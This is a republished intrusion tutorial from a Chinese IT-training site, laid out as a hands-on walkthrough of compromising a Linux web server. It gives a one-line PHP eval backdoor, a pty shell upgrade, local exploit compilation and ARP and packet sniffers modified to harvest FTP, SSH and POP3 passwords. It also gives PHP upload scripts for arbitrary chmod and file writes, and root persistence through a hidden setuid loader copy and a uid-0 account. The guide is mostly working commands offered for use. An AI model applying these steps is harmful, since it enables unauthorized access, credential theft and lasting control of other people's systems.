Deploy a One‑Line PHP Backdoor and Escalate Linux Privileges
This guide walks through creating a simple PHP backdoor, using Python pty for interactive shells, compiling and exploiting local binaries, sniffing network traffic with arpsniffer and linsniffer, and applying various Linux privilege‑escalation techniques to obtain root access.
1. Create a one‑line PHP backdoor
Upload a PHP file containing the following code to the target server: <?php @eval($_POST[md5])?> Save it as rankuplog_time.php and verify its content with cat rankuplog_time.php.
2. Initial foothold and privilege escalation
After gaining a limited shell, list the web directory: ls -la /www.users/ Use Python’s pty module to obtain an interactive shell: python -c 'import pty; pty.spawn("/bin/sh")' Check current user ID and kernel version:
id
uname -rTypical Linux privilege‑escalation vectors include third‑party software vulnerabilities, local trust features, and kernel overflows. Exploit databases such as http://tools.90sec.org/, http://sebug.net/paper/linux_exp/, and http://www.exploit-db.com/search/ can be consulted.
3. Compile and run local exploits
Upload source files (e.g., 2.c) to /tmp, compile them, and execute:
gcc -o 2 2.c
chmod +x 2
./2For the arpsniffer tool, install required libraries and compile:
rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz
tar zxvf libpcap-0.8.1.tar.gz
cd libpcap-0.8.1
./configure
make
make install
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnetRun the sniffer against the target network:
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110Capture traffic with tcpdump and save it to a file for later analysis:
tcpdump -i eth0 host 192.168.0.11 -w pop.txt4. Modify and use linsniffer to capture credentials
Edit linsniffer.c to monitor desired ports (e.g., FTP, SSH, POP3):
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
/* add other ports as needed */Compile and run:
gcc -o linsniffer linsniffer.c
./linsnifferThe captured usernames and passwords are stored in tcp.log.
5. Additional PHP-based privilege‑escalation scripts
Upload a script to change file permissions:
$path = stripslashes($_GET['path']);
$ok = chmod($path, 0777);
if($ok) echo "CHMOD OK, permission editable file or directory.";Upload a script to write arbitrary data to a file:
@$filename = stripslashes($_POST['filename']);
@$mess = stripslashes($_POST['mess']);
$fp = @fopen($filename, 'a');
@fputs($fp, $mess);
@fclose($fp);6. Final root persistence
After obtaining root, create a set‑uid backdoor:
cp /lib/ld-linux.so.2 /tmp/.str1ven
chmod +s /tmp/.str1venExecute it to retain root privileges, then add a new root user if desired: useradd -u 0 -o username Various system commands (e.g., cat /etc/passwd, ifconfig, service --status-all) can be used to enumerate the environment and verify the compromise.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
MaGe Linux Operations
Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.